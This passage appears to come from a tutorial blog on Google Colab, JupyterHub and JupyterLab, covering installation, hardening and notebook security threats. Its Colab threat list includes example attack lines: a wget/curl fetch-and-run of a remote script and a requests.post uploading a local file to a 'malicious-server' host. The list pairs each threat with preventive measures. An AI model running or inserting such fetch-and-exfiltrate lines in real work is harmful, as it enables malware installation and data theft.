    Regularly monitor login activity
- Unauthorized Access via Over-Sharing
  - Someone shares a notebook as “Anyone with the link – Editor”, and a threat actor discovers the link.
  - Impact:
    
    The threat actor can modify the notebook, insert malicious code, or exfiltrate data
    
    Other users who run the notebook may unknowingly execute harmful commands
  - Preventive Measures :
    
    Limit sharing to specific people
    
    Use Viewer or Commenter access when editing isn’t needed
- Malicious Code Injection
  - A threat actor provides a notebook containing malicious commands, which someone runs in Colab: !wget https://example.com/script.sh && !bash script.sh or curl -sL https://example.com/script.sh | bash
  - Impact:
    
    The code could install malware or spyware
    
    It might steal data from the mounted Google Drive
    
    It could send sensitive data to external servers
  - Preventive Measures :
    
    Review all code before executing
    
    Avoid running untrusted notebooks, especially shell commands (!)
    
    Mount the drive only when necessary
- 5: Data Exfiltration
  - A threat actor sneaks code into a shared notebook that uploads files from someone’s session to a remote server: requests.post("https://malicious-server.com/upload", files={"file": open("data.csv","rb")})
  - Impact:
    
    Sensitive data, credentials, or IP information may be stolen
    
    The person may not realize the data has been compromised until it’s too late
  - Preventive Measures :
    
    Avoid running unknown scripts
    
    Inspect network calls in notebooks
    
    Clear outputs and restart the runtime before sharing
- Ransomware-Style Attack
  - A threat actor sends a notebook that encrypts files in someone’s mounted Google Drive when executed.
  - Impact:
    
    Access to the files is blocked until a ransom is paid
    Data loss or corruption may occur
  - Preventive Measures :
    
    Keep backups of important files
    
    Avoid running notebooks from untrusted sources
    
    Limit Colab access and Drive mounting to trusted notebooks only
Create a Notebook

After logging in, go to New Notebook or go to File, then New Notebook.

Or

Rename the Notebook

You can rename the notebook by left-clicking its name.

Execute Python Code

In the top-left corner, the + Code button adds code snippets to the interactive document. The code snippets have a right arrow symbol. Type print("Hello world") and click on that arrow

Result

Wrapping Output Text

If you want the text to be wrapped, execute the following in the first cell as code

from IPython.display import HTML, display # Imports HTML display tools, HTML() lets you write HTML/CSS and display() renders it in the notebook
def css(): # Create a function
display(HTML(”'<style>pre {white-space: pre-wrap;}</style>”’)) # Injects CSS to make all <pre> blocks (code cells) wrap long lines instead of scrolling horizontally.
get_ipython().events.register(‘pre_run_cell’, css) # The CSS is applied automatically before every cell runs.
```
from IPython.display import HTML, display

def css():
  display(HTML('''<style>pre {white-space: pre-wrap;}</style>'''))

get_ipython().events.register('pre_run_cell', css)
```
Result

Colab Virtual Instance IP

Colab virtual instances (Containers) are connected to internet

from requests import get # Imports the get function from the requests library to make HTTP requests
ip = get(‘https://api.ipify.org’).content.decode(‘utf8’) # Sends a request to api.ipify.org, a service that returns your public IP as plain text, the return will converted it into a string
print(“Public IP is: “, ip) # Prints your public IP in a readable format
```
from requests import get
ip = get('https://api.ipify.org').content.decode('utf8')
print("Public IP is: ", ip)
```
Result

Colab Processes

You can get current processes using psutil module

import psutil # Imports the psutil library, which is used for system monitoring (CPU, memory, processes)
for id in psutil.pids(): # Returns a list of all process IDs (PIDs) currently running and loops through them
print(psutil.Process(id).name()) # prints each process name
```
import psutil
for id in psutil.pids():
    print(psutil.Process(id).name())
```
Result

Colab Extensions

Colab Extensions are extra tools or add-ons that enhance Google Colab’s functionality beyond its default features. They help you work faster, explore data better, and customize your notebook experience. google.colab.data_table is a module in Google Colab that lets you display pandas DataFrames as interactive tables inside a notebook (Some Colab Extensions already loaded in the notebook).

%load_ext google.colab.data_table # Load Colab extension to display DataFrames as interactive tables

import pandas as pd # Import pandas library for data manipulation
import numpy as np # Import numpy library for numerical operations

data = { # Create a dictionary with sample data
‘Name’: [‘John’, ‘Jane’, ‘Joe’], # List of names
‘Sales’: [25, 30, 35], # List of corresponding sales numbers
‘City’: [‘New York’, ‘Los Angeles’, ‘Houston’] # List of corresponding cities
}

df = pd.DataFrame(data) # Convert dictionary to pandas DataFrame
df.to_csv(‘dummy_data.csv’, index=False) # Save DataFrame to CSV file without index column
df # Display the DataFrame in the notebook
```
%load_ext google.colab.data_table

import pandas as pd
import numpy as np

data = {
    'Name': ['John', 'Jane', 'Joe'],
    'Sales': [25, 30, 35],
    'City': ['New York', 'Los Angeles', 'Houston']
}

df = pd.DataFrame(data)
df.to_csv('dummy_data.csv', index=False)
df
```
Result

Colab Environment Variables

To securely access saved secrets (like API keys) in Google Colab without putting them directly in your code, use google.colab.userdata. It helps protect sensitive information when sharing notebooks.

Then, you will see the secret
March 30, 2026
JupyterHub
JupyterHub

JupyterHub is an open-source platform that provides multi-user access to Jupyter Notebook or JupyterLab environments. While JupyterLab or the single-user Jupyter Notebook server is suitable for individual users, JupyterHub is ideal for educational institutions, research groups, or organizations that need multiple users to have their own interactive computing environments on a shared server. Each user gets a personal, isolated instance of a Jupyter Notebook or JupyterLab server, while administrators can centrally manage authentication, resource allocation, and access control.

JupyterHub supports a variety of authentication methods, including OAuth, LDAP, GitHub, and custom systems, making it flexible for different organizational needs. It can be deployed on a single server or scaled across cloud infrastructure or high-performance computing clusters, allowing dozens or even hundreds of users to run notebooks simultaneously.

Security is a critical concern for JupyterHub deployments. Because it exposes interactive coding environments over a network, improper configuration can allow threat actors to exploit vulnerabilities, gain unauthorized access, or use the server for malicious activities, such as launching attacks or mining cryptocurrencies. To mitigate risks, administrators should enforce strong authentication, HTTPS encryption, firewall rules, and regular updates.

Key features of JupyterHub include:
- Multi-user management: Centralized control over multiple notebook instances.
- Customizable environments: Each user can have their own libraries and resources without affecting others.
- Scalability: Can run on local servers, cloud platforms, or containerized systems like Docker or Kubernetes.
- Integration with JupyterLab: Users can work in the modern JupyterLab interface while administrators manage the backend infrastructure.
Overall, JupyterHub provides a secure, scalable, and collaborative platform for teams or classrooms that need interactive computing environments, but it requires careful setup to maintain security and reliability.

Installing JupyterHub on Ubuntu Server

We will be installing JupyterHub in the Ubuntu Server VM. The installation process takes ~5-10 minutes to finish.
1. Setup Ubuntu Server in a VM
2. Go to the terminal and run
  1. sudo apt install python3 python3-dev git curl
  2. curl -L https://tljh.jupyter.org/bootstrap.py | sudo -E python3 - --admin admin
3. Verify that JupyterHub is working by running sudo lsof -i :80 in the terminal
4. Go to your web and type 127.0.0.0
5. Enter admin as username and type any strong password you would like to use
Hardening JupyterHub (Latest Software Version)

We installed JupyterHub from the company website using a bootstrap script. In this case, the script will pull the latest version of JupyterHub and install it for us. When installing software, always make sure it comes from a trusted source. If you install software manually, make sure to check its integrity using checksums.

Type server_ip/hub/admin# in the web browser

The software version does match the pip website

To update to the latest version, you can run this command in the terminal (Do not run this in JupyterHub)

curl # Command-line tool used to download data from a URL
-L # Tells curl to follow redirects (the URL may redirect to another location
https://tljh.jupyter.org/bootstrap.py # The URL of the bootstrap installer script for
| # pipe, sends the downloaded script directly to another command instead of saving it to a file.
sudo # Runs the next command with administrator (root) privileges, required to install system services and packages.
python3 # Uses the system’s Python 3 interpreter to execute the script
– # Tells Python to read the script from standard input (stdin) (i.e., from the pipe
–version=latest # Argument passed to bootstrap.py, instructing it to install the latest TLJH release
```
(VM) $ curl -L https://tljh.jupyter.org/bootstrap.py | sudo python3 - --version=latest
```
Hardening JupyterHub Server (Change default credentials or adding regular users)

Type server_ip/hub/admin# in the web browser. If you used default usernames and passwords, you can change them from here (Remember, do not use default usernames and passwords in production environments – You can have default credentials in testing environments, but not production environments).

Also, you can manage the users using tljh-config

sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
add-item # A subcommand that adds a value to a list-type configuration setting.
users.admin # The configuration key that stores the list of JupyterHub admin users.
<username> # The Linux/JupyterHub username you want to grant admin privileges to (Replace this with the actual username.
```
(VM) $ sudo tljh-config add-item users.admin <username>
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
```
(VM) $ sudo tljh-config reload
```
Or, you can delete a use

sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
add-item # A subcommand that adds a value to a list-type configuration setting.
users.admin # The configuration key that stores the list of JupyterHub admin users.
<username> # The Linux/JupyterHub username you want to delete (Replace this with the actual username.
```
(VM) $ sudo tljh-config remove-item users.admin <username>
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
```
(VM) $ sudo tljh-config reload
```
Hardening JupyterHub (Disabling Features)

To disable accessing the terminal (This does not disable magic commands – threat actors can still utilize magic commands)

Generate jupyter_notebook_config.py and move it to /opt/tljh/user/etc/jupyter

/opt/tljh/user/bin/jupyter # The Jupyter executable from TLJH’s user Python environment (not the system Python).
notebook # Runs the classic Jupyter Notebook application (not JupyterLab).
–generate-config # Tells Jupyter to create a default configuration file and then exit.
```
(VM) $ /opt/tljh/user/bin/jupyter notebook --generate-config
Writing default config to: /home/<change this to the current username>/.jupyter/jupyter_notebook_config.py
```
sudo # Runs the command with administrator (root) privileges because you are moving a file into a system-managed directory.
mv # The Linux command to move or rename files.
/home/<username>/.jupyter/jupyter_notebook_config.py # The source file: a Jupyter Notebook configuration file generated earlier.
/opt/tljh/<username>/etc/jupyter/ # The destination directory for TLJH-managed Jupyter configuration.
```
(VM) $ sudo mv /home/test/.jupyter/jupyter_notebook_config.py /opt/tljh/user/etc/jupyter/
```
After that, change the #c.ServerApp.terminals_enabled = False to c.ServerApp.terminals_enabled = False in the copied file /opt/tljh/user/etc/jupyter/jupyter_notebook_config.py

sudo # Runs the command with administrator (root) privileges because you are moving a file into a system-managed directory.
nano # A simple command-line text editor in Linux.
/opt/tljh/user/etc/jupyter/jupyter_notebook_config.py # The system-wide Jupyter Notebook configuration file for TLJH
```
(VM) $ sudo nano /opt/tljh/user/etc/jupyter/jupyter_notebook_config.py
```
Reload JupyterHub

sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
```
(VM) $ sudo tljh-config reload
```
Now, the terminal is removed

Hardening JupyterHub (Enabling HTTPS)

We will be using a self-signed cert for HTTPS using the openssl command

mkdir # Linux command to create a new directory – folder).
/etc/https # The path for the new directory you want to create.
```
(VM) $ mkdir /etc/https
```
cd # Linux command to change the current directory in the terminal.
/etc/https # The path to the directory you want to switch to.
```
(VM) $ cd /etc/https
```
sudo # Runs the command with administrator privileges, necessary because you’re creating files in a system directory (/etc/https)
openssl # The OpenSSL tool, used to generate SSL/TLS certificates, keys, and handle encryption.
req # Command to create a certificate signing request (CSR) or self-signed certificate.
-x509 # Creates a self-signed certificate instead of generating a CSR to send to a certificate authority.
-newkey rsa:4096 # Generates a new RSA key pair with 4096-bit encryption.
-keyout key.pem # Specifies the filename for the private key.
-out cert.pem # Specifies the filename for the certificate itself.
-sha256 # Uses the SHA-256 hash algorithm for signing the certificate.
-days 3650 # Sets the certificate validity to 3650 days (~10 years).
-nodes # Stands for “no DES” — the private key will not be encrypted with a passphrase. Needed for services that start automatically, like JupyterHub, so you don’t have to type a password on startup.
-subj “/C=US/ST=Washington/L=Vancover/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname” # Provides certificate details in a single line, C: Country (US), ST: State (Washington), L: City (Vancover), O: Organization (CompanyName), OU: Organizational Unit (CompanySectionName), CN: Common Name or Hostname (e.g., example.com or your server IP))
```
(VM) $ sudo openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/C=US/ST=Washington/L=Vancover/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname"
```
sudo # Runs the command with administrator privileges. Needed because /etc/https is a system directory.
chown # Linux command to change the ownership of files and directories.
root # Specifies the new owner.
-R # Stands for recursive. Applies the ownership change to all files and subdirectories inside /etc/https.
/etc/https # The directory to change ownership for and everything inside it).
```
(VM) $ sudo chown root -R /etc/https
```
sudo # Runs the command with administrator privileges because /etc/https is a system directory.
chmod # Linux command to change file permissions.
0600 # Permission mode in octal format. Only root can read/write the files; nobody else can access them: Owner (root) → read & write (6), Group → no permissions (0), Others → no permissions (0)
-R # Stands for recursive. Applies permissions to all files and subdirectories under /etc/https.
/etc/https # The directory being modified, containing your SSL certificate and private key
```
(VM) $ sudo chmod 0600 -R /etc/https
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
set # A subcommand that sets a configuration key to a specific value.
https.tls.key # The configuration key specifying the path to the TLS private key for HTTPS.
/etc/https/key.pem # The path to the private key file you generated earlier. This file must be readable by root, which it is, because of chmod 600
```
(VM) $ sudo tljh-config set https.tls.key /etc/https/key.pem
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
set # A subcommand that sets a configuration key to a specific value.
https.tls.cert # The configuration key specifying the path to the TLS certificate for HTTPS
/etc/https/cert.pem # The path to your SSL certificate file you generated earlier. This file must be readable by root, which it is, because of chmod 600
```
(VM) $ sudo tljh-config set https.tls.cert /etc/https/cert.pem
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
set # A subcommand that sets a configuration key to a specific value.
https.enabled # The TLJH configuration key that turns HTTPS on or off
true # Sets the value of https.enabled to true, enabling HTTPS for JupyterHub
```
(VM) $ sudo tljh-config set https.enabled true
```
sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
reload # Applies configuration changes by restarting/reloading JupyterHub services.
proxy # Specifies that only the reverse proxy service should be reloaded
```
(VM) $ sudo tljh-config reload proxy
```
Type the IP address of the JupyterHub Server and create an exception for the self-signed certification
March 29, 2026
JupyterLab
JupyterLab

JupyterLab is an open-source web-based interactive development environment primarily used for data science, scientific computing, and machine learning. It allows users to create and manage interactive documents that combine live code, visualizations, equations, and narrative text in a single workspace. These documents are saved with the .ipynb extension, which stands for IPython Notebook, reflecting its origins in the IPython project.

Unlike traditional text editors or IDEs, JupyterLab provides a highly flexible interface that lets users open multiple notebooks, terminals, text files, and data viewers simultaneously in tabs or split screens. It supports numerous programming languages, with Python being the most common, and offers extensive integration with libraries for data analysis, plotting, and machine learning, such as NumPy, pandas, Matplotlib, and TensorFlow.

Key features of JupyterLab include:
- Interactive code execution: Run code in real-time, see outputs immediately, and modify code cells independently.
- Rich media support: Embed images, videos, interactive plots, and LaTeX equations directly within notebooks.
- Extensible interface: Customize the environment with extensions like version control, debugging tools, or additional language kernels.
- Collaboration and sharing: Notebooks can be shared with others, exported to multiple formats (HTML, PDF, Markdown), or run on cloud platforms like Google Colab or Binder.
Overall, JupyterLab is a powerful tool for data exploration, analysis, and presentation, combining code execution and documentation into a single cohesive platform.

Installing JupyterLab on Windows
1. Install Python (Make sure to check mark the Add Python X To Path in the installation window)
2. Go to the CMD and install jupyterlab using pip install jupyterlab
Installing JupyterLab on Linux-based OS (Ubuntu)
1. Go to the terminal
  1. Install Python using sudo apt-get install python3
  2. Install pip using sudo apt-get install python3-pip
  3. Install jupyterlab using pip3 install jupyterlab
Installing JupyterLab on MacOS
1. Go to the terminal
  1. Install jupyterlab using pip3 install jupyterlab
In some operating systems, such as Windows, the pip command is aliased to pip3.

Alternatives

*If you are having issues with installing JupyterLab, use, use Visual Studio Code or any environment that supports that
- Jupyter Notebooks in VS Code
Running JupyterLab

You can use the interactive interface using the JupyterLab command in the terminal or command line interpreter. That command takes different switches, and the one that we will use is lab (You may need to elevate privileges). You may need to close the terminal or CMD before running the jupyterlab command because new environment variables are added (the easiest way to refresh them is to simply close the terminal or CMD and open it again).

jupyter # Main Jupyter command-line tool
lab # Subcommand to launch the JupyterLab interface
```
(Host) jupyter lab
```
or

python # Starts the Python interpreter
-m # Tells Python to run a module as a script, instead of running a .py file
jupyterlab # The name of the Python module being executed
```
(Host) python -m jupyterlab
...
...
...
[C 2023-09-23 13:06:53.906 ServerApp] 
 
    To access the server, open this file in a browser:
        file:///Users/pc/Library/Jupyter/runtime/jpserver-5633-open.html
    Or copy and paste one of these URLs:
        http://localhost:8889/lab
        http://127.0.0.1:8889/lab
```
The browser will open and show the interactive interface. If the browser did not open, you can open the browser and open the URL shown from the terminal or command line interpreter

Create a Jupyter Notebook

You can create a notebook by clicking on File, then New, then Notebook. Or, you can click on the following icon

You can change the newly created file name by right-clicking on the file tab, then Rename Notebook

In the notebook file, make sure that code is selected and type print("test")

To execute the code, click the play icon; your code will run, and the result is shown in the next line. You can re-execute this block as many times as you want

Magic Commands

Also known as magic functions, these are commands that modify the behavior or code explicitly, extending the notebook’s capabilities. Some of them allow users to escape the Python interpreter. E.g., you can run a shell command and capture its output by using the ! character before the command. This is helpful when the user is limited to the notebook interface.

If you try to the whoami command, it will fail because it will be interrupted as Python code

If you try the whoami command, it will fail because it will be interrupted as Python code

Shutting down JupyterLab

You can shut down the Jupyter lab from the terminal or command line interrupter by using CTRL with C or X. Or, go File, then shutdown

Setting up Password

You can configure a password for JupyterLab that must be entered before a user can access the interface, ensuring secure access to the environment

jupyter # Main Jupyter command-line tool
lab # Subcommand to launch the JupyterLab interface
password # Option to setup/change password
```
(Host) jupyter lab password
Enter password: 
Verify password: 
[JupyterPasswordApp] Wrote hashed password to /Users/user/.jupyter/jupyter_server_config.json
```
jupyter # Main Jupyter command-line tool
lab # Subcommand to launch the JupyterLab interface
```
(Host) jupyter lab
...
...
...
[C 2023-09-23 13:06:53.906 ServerApp] 
 
    To access the server, open this file in a browser:
        file:///Users/pc/Library/Jupyter/runtime/jpserver-5633-open.html
    Or copy and paste one of these URLs:
        http://localhost:8889/lab
        http://127.0.0.1:8889/lab
```
External Modules

The following are some of the external modules used in data analysis and visualization
- numpy – a library for large multidimensional arrays
- pandas – a library for data analysis
- matplotlib – a library for creating interactive visualizations
Install Modules

You can install all the modules using the install switch in pip3

! # In Jupyter Notebook, ! lets you run shell commands from a cell.
pip # Python’s package manager
install # A command to download and install libraries from PyPI (Python Package Index
numpy # Library for numerical computing, arrays, and matrices.
pandas # Library for data manipulation and analysis, especially tabular data.
matplotlib # Library for creating plots and visualizations in Python.
beautifulsoup4 # Library for parsing HTML and XML, often used in web scraping.
lxml # Library for fast XML and HTML parsing, used by BeautifulSoup for speed and reliability.
selenium # Library for automating web browsers, often used for testing or web scraping dynamic websites.
webdriver-manager # Library to automatically download and manage browser drivers for Selenium, like ChromeDriver or GeckoDriver.
```
!pip install numpy pandas matplotlib beautifulsoup4 lxml selenium webdriver-manager
```
Review Modules

You can review all installed module using the list switch in pip3

! # In Jupyter Notebook, ! lets you run shell commands from a cell.
pip # Python’s package manager
list # A command to list all installed packages
```
!pip list
```
Remove Modules

You can remove any module using the uninstall switch in pip3

! # In Jupyter Notebook, ! lets you run shell commands from a cell.
pip # Python’s package manager
list # A command to uninstall a package
xyz # A package to uninstall from the system
```
!pip uninstall xyz
```
March 29, 2026